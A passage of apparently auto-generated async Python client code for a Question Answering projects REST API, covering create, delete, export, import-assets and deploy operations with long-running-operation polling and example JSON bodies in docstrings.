:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# response body for status code(s): 200, 201
response == {
"createdDateTime": "2020-02-20 00:00:00", # Optional. Project creation
date-time.
"description": "str", # Optional. Description of the project.
"language": "str", # Optional. Language of the text records. This is BCP-47
representation of a language. For example, use "en" for English; "es" for Spanish
etc. If not set, use "en" for English as default.
"lastDeployedDateTime": "2020-02-20 00:00:00", # Optional. Represents the
project last deployment date-time.
"lastModifiedDateTime": "2020-02-20 00:00:00", # Optional. Represents the
project last modified date-time.
"multilingualResource": bool, # Optional. Resource enabled for multiple
languages across projects or not.
"projectName": "str", # Optional. Name of the project.
"settings": {
"defaultAnswer": "str" # Optional. Default Answer response when no
good match is found in the knowledge base.
}
}
"""
@distributed_trace_async
async def create_project(self, project_name: str, options: Union[JSON, IO], **kwargs: Any) -> JSON:
"""Create or update a project.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/create-project
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:param options: Parameters needed to create the project. Is either a model type or a IO type.
Required.
:type options: JSON or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:return: JSON object
:rtype: JSON
:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# response body for status code(s): 200, 201
response == {
"createdDateTime": "2020-02-20 00:00:00", # Optional. Project creation
date-time.
"description": "str", # Optional. Description of the project.
"language": "str", # Optional. Language of the text records. This is BCP-47
representation of a language. For example, use "en" for English; "es" for Spanish
etc. If not set, use "en" for English as default.
"lastDeployedDateTime": "2020-02-20 00:00:00", # Optional. Represents the
project last deployment date-time.
"lastModifiedDateTime": "2020-02-20 00:00:00", # Optional. Represents the
project last modified date-time.
"multilingualResource": bool, # Optional. Resource enabled for multiple
languages across projects or not.
"projectName": "str", # Optional. Name of the project.
"settings": {
"defaultAnswer": "str" # Optional. Default Answer response when no
good match is found in the knowledge base.
}
}
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = kwargs.pop("params", {}) or {}
content_type = kwargs.pop("content_type", _headers.pop("Content-Type", None)) # type: Optional[str]
cls = kwargs.pop("cls", None) # type: ClsType[JSON]
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(options, (IO, bytes)):
_content = options
else:
_json = options
request = build_create_project_request(
project_name=project_name,
content_type=content_type,
api_version=self._config.api_version,
json=_json,
content=_content,
headers=_headers,
params=_params,
)
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if response.status_code == 200:
if response.content:
deserialized = response.json()
else:
deserialized = None
if response.status_code == 201:
if response.content:
deserialized = response.json()
else:
deserialized = None
if cls:
return cls(pipeline_response, cast(JSON, deserialized), {})
return cast(JSON, deserialized)
async def _delete_project_initial(self, project_name: str, **kwargs: Any) -> Optional[JSON]:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = kwargs.pop("params", {}) or {}
cls = kwargs.pop("cls", None) # type: ClsType[Optional[JSON]]
request = build_delete_project_request(
project_name=project_name,
api_version=self._config.api_version,
headers=_headers,
params=_params,
)
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
deserialized = None
response_headers = {}
if response.status_code == 200:
if response.content:
deserialized = response.json()
else:
deserialized = None
if response.status_code == 202:
response_headers["Operation-Location"] = self._deserialize(
"str", response.headers.get("Operation-Location")
)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
@distributed_trace_async
async def begin_delete_project(self, project_name: str, **kwargs: Any) -> AsyncLROPoller[JSON]:
"""Delete the project.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/delete-project
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncLROBasePolling. Pass in False
for this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns JSON object
:rtype: ~azure.core.polling.AsyncLROPoller[JSON]
:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# response body for status code(s): 200
response == {
"createdDateTime": "2020-02-20 00:00:00", # Required.
"jobId": "str", # Required.
"lastUpdatedDateTime": "2020-02-20 00:00:00", # Required.
"status": "str", # Job Status. Required. Known values are: "notStarted",
"running", "succeeded", "failed", "cancelled", "cancelling", and
"partiallyCompleted".
"errors": [
{
"code": "str", # One of a server-defined set of error codes.
Required. Known values are: "InvalidRequest", "InvalidArgument",
"Unauthorized", "Forbidden", "NotFound", "ProjectNotFound",
"OperationNotFound", "AzureCognitiveSearchNotFound",
"AzureCognitiveSearchIndexNotFound", "TooManyRequests",
"AzureCognitiveSearchThrottling",
"AzureCognitiveSearchIndexLimitReached", "InternalServerError", and
"ServiceUnavailable".
"message": "str", # A human-readable representation of the
error. Required.
"details": [
...
],
"innererror": {
"code": "str", # One of a server-defined set of
error codes. Required. Known values are: "InvalidRequest",
"InvalidParameterValue", "KnowledgeBaseNotFound",
"AzureCognitiveSearchNotFound", "AzureCognitiveSearchThrottling", and
"ExtractionFailure".
"message": "str", # Error message. Required.
"details": {
"str": "str" # Optional. Error details.
},
"innererror": ...,
"target": "str" # Optional. Error target.
},
"target": "str" # Optional. The target of the error.
}
],
"expirationDateTime": "2020-02-20 00:00:00" # Optional.
}
"""
_headers = kwargs.pop("headers", {}) or {}
_params = kwargs.pop("params", {}) or {}
cls = kwargs.pop("cls", None) # type: ClsType[JSON]
polling = kwargs.pop("polling", True) # type: Union[bool, AsyncPollingMethod]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_project_initial( # type: ignore
project_name=project_name, cls=lambda x, y, z: x, headers=_headers, params=_params, **kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
if response.content:
deserialized = response.json()
else:
deserialized = None
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
if polling is True:
polling_method = cast(
AsyncPollingMethod,
AsyncLROBasePolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs),
) # type: AsyncPollingMethod
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
async def _export_initial(
self, project_name: str, *, file_format: str = "json", asset_kind: Optional[str] = None, **kwargs: Any
) -> Optional[JSON]:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = kwargs.pop("params", {}) or {}
cls = kwargs.pop("cls", None) # type: ClsType[Optional[JSON]]
request = build_export_request(
project_name=project_name,
file_format=file_format,
asset_kind=asset_kind,
api_version=self._config.api_version,
headers=_headers,
params=_params,
)
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
deserialized = None
response_headers = {}
if response.status_code == 200:
if response.content:
deserialized = response.json()
else:
deserialized = None
if response.status_code == 202:
response_headers["Operation-Location"] = self._deserialize(
"str", response.headers.get("Operation-Location")
)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
@distributed_trace_async
async def begin_export(
self, project_name: str, *, file_format: str = "json", asset_kind: Optional[str] = None, **kwargs: Any
) -> AsyncLROPoller[JSON]:
"""Export project metadata and assets.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/export
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:keyword file_format: Knowledge base Import or Export format. Known values are: "json", "tsv",
and "excel". Default value is "json".
:paramtype file_format: str
:keyword asset_kind: Kind of the asset of the project. Known values are: "qnas" and "synonyms".
Default value is None.
:paramtype asset_kind: str
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncLROBasePolling. Pass in False
for this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns JSON object
:rtype: ~azure.core.polling.AsyncLROPoller[JSON]
:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# response body for status code(s): 200
response == {
"createdDateTime": "2020-02-20 00:00:00", # Required.
"jobId": "str", # Required.
"lastUpdatedDateTime": "2020-02-20 00:00:00", # Required.
"resultUrl": "str", # URL to download the result of the Export Job.
Required.
"status": "str", # Job Status. Required. Known values are: "notStarted",
"running", "succeeded", "failed", "cancelled", "cancelling", and
"partiallyCompleted".
"errors": [
{
"code": "str", # One of a server-defined set of error codes.
Required. Known values are: "InvalidRequest", "InvalidArgument",
"Unauthorized", "Forbidden", "NotFound", "ProjectNotFound",
"OperationNotFound", "AzureCognitiveSearchNotFound",
"AzureCognitiveSearchIndexNotFound", "TooManyRequests",
"AzureCognitiveSearchThrottling",
"AzureCognitiveSearchIndexLimitReached", "InternalServerError", and
"ServiceUnavailable".
"message": "str", # A human-readable representation of the
error. Required.
"details": [
...
],
"innererror": {
"code": "str", # One of a server-defined set of
error codes. Required. Known values are: "InvalidRequest",
"InvalidParameterValue", "KnowledgeBaseNotFound",
"AzureCognitiveSearchNotFound", "AzureCognitiveSearchThrottling", and
"ExtractionFailure".
"message": "str", # Error message. Required.
"details": {
"str": "str" # Optional. Error details.
},
"innererror": ...,
"target": "str" # Optional. Error target.
},
"target": "str" # Optional. The target of the error.
}
],
"expirationDateTime": "2020-02-20 00:00:00" # Optional.
}
"""
_headers = kwargs.pop("headers", {}) or {}
_params = kwargs.pop("params", {}) or {}
cls = kwargs.pop("cls", None) # type: ClsType[JSON]
polling = kwargs.pop("polling", True) # type: Union[bool, AsyncPollingMethod]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = await self._export_initial( # type: ignore
project_name=project_name,
file_format=file_format,
asset_kind=asset_kind,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
if response.content:
deserialized = response.json()
else:
deserialized = None
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
if polling is True:
polling_method = cast(
AsyncPollingMethod,
AsyncLROBasePolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs),
) # type: AsyncPollingMethod
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
async def _import_assets_initial(
self,
project_name: str,
options: Optional[Union[JSON, IO]] = None,
*,
file_format: str = "json",
asset_kind: Optional[str] = None,
**kwargs: Any
) -> Optional[JSON]:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = kwargs.pop("params", {}) or {}
content_type = kwargs.pop("content_type", _headers.pop("Content-Type", None)) # type: Optional[str]
cls = kwargs.pop("cls", None) # type: ClsType[Optional[JSON]]
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(options, (IO, bytes)):
_content = options
else:
if options is not None:
_json = options
else:
_json = None
request = build_import_assets_request(
project_name=project_name,
file_format=file_format,
asset_kind=asset_kind,
content_type=content_type,
api_version=self._config.api_version,
json=_json,
content=_content,
headers=_headers,
params=_params,
)
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
deserialized = None
response_headers = {}
if response.status_code == 200:
if response.content:
deserialized = response.json()
else:
deserialized = None
if response.status_code == 202:
response_headers["Operation-Location"] = self._deserialize(
"str", response.headers.get("Operation-Location")
)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
@overload
async def begin_import_assets(
self,
project_name: str,
options: Optional[JSON] = None,
*,
file_format: str = "json",
asset_kind: Optional[str] = None,
content_type: str = "application/json",
**kwargs: Any
) -> AsyncLROPoller[JSON]:
"""Import project assets.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/import
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:param options: Project assets the needs to be imported. Default value is None.
:type options: JSON
:keyword file_format: Knowledge base Import or Export format. Known values are: "json", "tsv",
and "excel". Default value is "json".
:paramtype file_format: str
:keyword asset_kind: Kind of the asset of the project. Known values are: "qnas" and "synonyms".
Default value is None.
:paramtype asset_kind: str
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncLROBasePolling. Pass in False
for this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns JSON object
:rtype: ~azure.core.polling.AsyncLROPoller[JSON]
:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
options = {
"assets": {
"qnas": [
{
"activeLearningSuggestions": [
{
"clusterHead": "str", # Optional.
Question chosen as the head of suggested questions cluster by
Active Learning clustering algorithm.
"suggestedQuestions": [
{
"autoSuggestedCount":
0, # Optional. The number of times the question was
suggested automatically by the Active Learning
algorithm.
"question": "str", #
Optional. Question suggested by the Active Learning
feature.
"userSuggestedCount":
0 # Optional. The number of times the question was
suggested explicitly by the user.
}
]
}
],
"answer": "str", # Optional. Answer text.
"dialog": {
"isContextOnly": bool, # Optional. To mark
if a prompt is relevant only with a previous question or not. If
true, do not include this QnA as answer for queries without
context; otherwise, ignores context and includes this QnA in
answers.
"prompts": [
{
"displayOrder": 0, #
Optional. Index of the prompt. It is used for ordering of
the prompts.
"displayText": "str", #
Optional. Text displayed to represent a follow up
question prompt.
"qna": {
"activeLearningSuggestions": [
{
"clusterHead": "str", # Optional. Question
chosen as the head of suggested questions
cluster by Active Learning clustering
algorithm.
"suggestedQuestions": [
{
"autoSuggestedCount": 0, # Optional.
The number of times the question was
suggested automatically by the Active
Learning algorithm.
"question": "str", # Optional.
Question suggested by the Active
Learning feature.
"userSuggestedCount": 0 # Optional.
The number of times the question was
suggested explicitly by the user.
}
]
}
],
"answer": "str", #
Optional. Answer text.
"dialog": ...,
"id": 0, # Optional.
Unique ID for the QnA.
"metadata": {
"str": "str"
# Optional. Metadata associated with the answer,
useful to categorize or filter question answers.
},
"questions": [
"str" #
Optional. List of questions associated with the
answer.
],
"source": "str" #
Optional. Source from which QnA was indexed e.g.
https://docs.microsoft.com/en-us/azure/cognitive-services/QnAMaker/FAQs
.
},
"qnaId": 0 # Optional. ID of
the QnA corresponding to the prompt.
}
]
},
"id": 0, # Optional. Unique ID for the QnA.
"lastUpdatedDateTime": "2020-02-20 00:00:00", #
Optional. Date-time when the QnA was last updated.
"metadata": {
"str": "str" # Optional. Metadata associated
with the answer, useful to categorize or filter question answers.
},
"questions": [
"str" # Optional. List of questions
associated with the answer.
],
"source": "str", # Optional. Source from which QnA
was indexed e.g.
https://docs.microsoft.com/en-us/azure/cognitive-services/QnAMaker/FAQs
.
"sourceDisplayName": "str" # Optional. Friendly name
of the Source.
}
],
"synonyms": [
{
"alterations": [
"str" # Collection of word alterations.
Required.
]
}
]
},
"fileUri": "str", # Optional. Import data File URI.
"metadata": {
"language": "str", # Language of the text records. This is BCP-47
representation of a language. For example, use "en" for English; "es" for
Spanish etc. If not set, use "en" for English as default. Required.
"description": "str", # Optional. Description of the project.
"multilingualResource": bool, # Optional. Set to true to enable
creating knowledgebases in different languages for the same resource.
"settings": {
"defaultAnswer": "str" # Optional. Default Answer response
when no good match is found in the knowledge base.
}
}
}
# response body for status code(s): 200
response == {
"createdDateTime": "2020-02-20 00:00:00", # Required.
"jobId": "str", # Required.
"lastUpdatedDateTime": "2020-02-20 00:00:00", # Required.
"status": "str", # Job Status. Required. Known values are: "notStarted",
"running", "succeeded", "failed", "cancelled", "cancelling", and
"partiallyCompleted".
"errors": [
{
"code": "str", # One of a server-defined set of error codes.
Required. Known values are: "InvalidRequest", "InvalidArgument",
"Unauthorized", "Forbidden", "NotFound", "ProjectNotFound",
"OperationNotFound", "AzureCognitiveSearchNotFound",
"AzureCognitiveSearchIndexNotFound", "TooManyRequests",
"AzureCognitiveSearchThrottling",
"AzureCognitiveSearchIndexLimitReached", "InternalServerError", and
"ServiceUnavailable".
"message": "str", # A human-readable representation of the
error. Required.
"details": [
...
],
"innererror": {
"code": "str", # One of a server-defined set of
error codes. Required. Known values are: "InvalidRequest",
"InvalidParameterValue", "KnowledgeBaseNotFound",
"AzureCognitiveSearchNotFound", "AzureCognitiveSearchThrottling", and
"ExtractionFailure".
"message": "str", # Error message. Required.
"details": {
"str": "str" # Optional. Error details.
},
"innererror": ...,
"target": "str" # Optional. Error target.
},
"target": "str" # Optional. The target of the error.
}
],
"expirationDateTime": "2020-02-20 00:00:00" # Optional.
}
"""
@overload
async def begin_import_assets(
self,
project_name: str,
options: Optional[IO] = None,
*,
file_format: str = "json",
asset_kind: Optional[str] = None,
content_type: str = "application/json",
**kwargs: Any
) -> AsyncLROPoller[JSON]:
"""Import project assets.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/import
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:param options: Project assets the needs to be imported. Default value is None.
:type options: IO
:keyword file_format: Knowledge base Import or Export format. Known values are: "json", "tsv",
and "excel". Default value is "json".
:paramtype file_format: str
:keyword asset_kind: Kind of the asset of the project. Known values are: "qnas" and "synonyms".
Default value is None.
:paramtype asset_kind: str
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncLROBasePolling. Pass in False
for this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns JSON object
:rtype: ~azure.core.polling.AsyncLROPoller[JSON]
:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# response body for status code(s): 200
response == {
"createdDateTime": "2020-02-20 00:00:00", # Required.
"jobId": "str", # Required.
"lastUpdatedDateTime": "2020-02-20 00:00:00", # Required.
"status": "str", # Job Status. Required. Known values are: "notStarted",
"running", "succeeded", "failed", "cancelled", "cancelling", and
"partiallyCompleted".
"errors": [
{
"code": "str", # One of a server-defined set of error codes.
Required. Known values are: "InvalidRequest", "InvalidArgument",
"Unauthorized", "Forbidden", "NotFound", "ProjectNotFound",
"OperationNotFound", "AzureCognitiveSearchNotFound",
"AzureCognitiveSearchIndexNotFound", "TooManyRequests",
"AzureCognitiveSearchThrottling",
"AzureCognitiveSearchIndexLimitReached", "InternalServerError", and
"ServiceUnavailable".
"message": "str", # A human-readable representation of the
error. Required.
"details": [
...
],
"innererror": {
"code": "str", # One of a server-defined set of
error codes. Required. Known values are: "InvalidRequest",
"InvalidParameterValue", "KnowledgeBaseNotFound",
"AzureCognitiveSearchNotFound", "AzureCognitiveSearchThrottling", and
"ExtractionFailure".
"message": "str", # Error message. Required.
"details": {
"str": "str" # Optional. Error details.
},
"innererror": ...,
"target": "str" # Optional. Error target.
},
"target": "str" # Optional. The target of the error.
}
],
"expirationDateTime": "2020-02-20 00:00:00" # Optional.
}
"""
@distributed_trace_async
async def begin_import_assets(
self,
project_name: str,
options: Optional[Union[JSON, IO]] = None,
*,
file_format: str = "json",
asset_kind: Optional[str] = None,
**kwargs: Any
) -> AsyncLROPoller[JSON]:
"""Import project assets.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/import
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:param options: Project assets the needs to be imported. Is either a model type or a IO type.
Default value is None.
:type options: JSON or IO
:keyword file_format: Knowledge base Import or Export format. Known values are: "json", "tsv",
and "excel". Default value is "json".
:paramtype file_format: str
:keyword asset_kind: Kind of the asset of the project. Known values are: "qnas" and "synonyms".
Default value is None.
:paramtype asset_kind: str
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncLROBasePolling. Pass in False
for this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns JSON object
:rtype: ~azure.core.polling.AsyncLROPoller[JSON]
:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# response body for status code(s): 200
response == {
"createdDateTime": "2020-02-20 00:00:00", # Required.
"jobId": "str", # Required.
"lastUpdatedDateTime": "2020-02-20 00:00:00", # Required.
"status": "str", # Job Status. Required. Known values are: "notStarted",
"running", "succeeded", "failed", "cancelled", "cancelling", and
"partiallyCompleted".
"errors": [
{
"code": "str", # One of a server-defined set of error codes.
Required. Known values are: "InvalidRequest", "InvalidArgument",
"Unauthorized", "Forbidden", "NotFound", "ProjectNotFound",
"OperationNotFound", "AzureCognitiveSearchNotFound",
"AzureCognitiveSearchIndexNotFound", "TooManyRequests",
"AzureCognitiveSearchThrottling",
"AzureCognitiveSearchIndexLimitReached", "InternalServerError", and
"ServiceUnavailable".
"message": "str", # A human-readable representation of the
error. Required.
"details": [
...
],
"innererror": {
"code": "str", # One of a server-defined set of
error codes. Required. Known values are: "InvalidRequest",
"InvalidParameterValue", "KnowledgeBaseNotFound",
"AzureCognitiveSearchNotFound", "AzureCognitiveSearchThrottling", and
"ExtractionFailure".
"message": "str", # Error message. Required.
"details": {
"str": "str" # Optional. Error details.
},
"innererror": ...,
"target": "str" # Optional. Error target.
},
"target": "str" # Optional. The target of the error.
}
],
"expirationDateTime": "2020-02-20 00:00:00" # Optional.
}
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = kwargs.pop("params", {}) or {}
content_type = kwargs.pop("content_type", _headers.pop("Content-Type", None)) # type: Optional[str]
cls = kwargs.pop("cls", None) # type: ClsType[JSON]
polling = kwargs.pop("polling", True) # type: Union[bool, AsyncPollingMethod]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = await self._import_assets_initial( # type: ignore
project_name=project_name,
options=options,
file_format=file_format,
asset_kind=asset_kind,
content_type=content_type,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
if response.content:
deserialized = response.json()
else:
deserialized = None
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
if polling is True:
polling_method = cast(
AsyncPollingMethod,
AsyncLROBasePolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs),
) # type: AsyncPollingMethod
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
async def _deploy_project_initial(self, project_name: str, deployment_name: str, **kwargs: Any) -> Optional[JSON]:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = kwargs.pop("params", {}) or {}
cls = kwargs.pop("cls", None) # type: ClsType[Optional[JSON]]
request = build_deploy_project_request(
project_name=project_name,
deployment_name=deployment_name,
api_version=self._config.api_version,
headers=_headers,
params=_params,
)
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
deserialized = None
response_headers = {}
if response.status_code == 200:
if response.content:
deserialized = response.json()
else:
deserialized = None
if response.status_code == 202:
response_headers["Operation-Location"] = self._deserialize(
"str", response.headers.get("Operation-Location")
)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
@distributed_trace_async
async def begin_deploy_project(
self, project_name: str, deployment_name: str, **kwargs: Any
) -> AsyncLROPoller[JSON]:
"""Deploy project to production.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/deploy-project
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:param deployment_name: The name of the specific deployment of the project to use. Required.
:type deployment_name: str
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncLROBasePolling. Pass in False
for this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns JSON object
:rtype: ~azure.core.polling.AsyncLROPoller[JSON]
:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# response body for status code(s): 200
response == {
"deploymentName": "str", # Optional. Name of the deployment.
"lastDeployedDateTime": "2020-02-20 00:00:00" # Optional. Represents the
project last deployment date-time.
}
"""
_headers = kwargs.pop("headers", {}) or {}
_params = kwargs.pop("params", {}) or {}
cls = kwargs.pop("cls", None) # type: ClsType[JSON]
polling = kwargs.pop("polling", True) # type: Union[bool, AsyncPollingMethod]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = await self._deploy_project_initial( # type: ignore
project_name=project_name,
deployment_name=deployment_name,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
if response.content:
deserialized = response.json()
else:
deserialized = None
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
if polling is True:
polling_method = cast(
AsyncPollingMethod,
AsyncLROBasePolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs),
) # type: AsyncPollingMethod
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
